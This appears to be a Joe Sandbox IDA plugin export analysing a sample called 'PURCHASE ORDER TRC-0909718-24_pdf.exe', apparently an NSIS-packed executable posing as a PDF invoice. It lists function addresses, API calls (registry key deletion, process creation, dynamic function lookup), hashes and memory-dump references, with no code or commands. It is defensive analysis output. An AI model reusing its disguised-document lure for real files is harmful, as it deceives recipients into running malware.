Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp$C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll
API String ID: 3109718747-3235459135
Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D

Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68

Function 00405F22 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90

Strings

Call, xrefs: 00405F25

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5

Function 00405A09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00405B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405B6A
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD

Function 00405735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
CloseHandle.KERNEL32(0040A300), ref: 0040576B

Strings

Error launching installer, xrefs: 00405748

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78

Function 00403809 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
GlobalFree.KERNEL32(?), ref: 0040382A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403809

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8

Function 00405A55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B

Strings

C:\Users\user\Desktop, xrefs: 00405A55

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
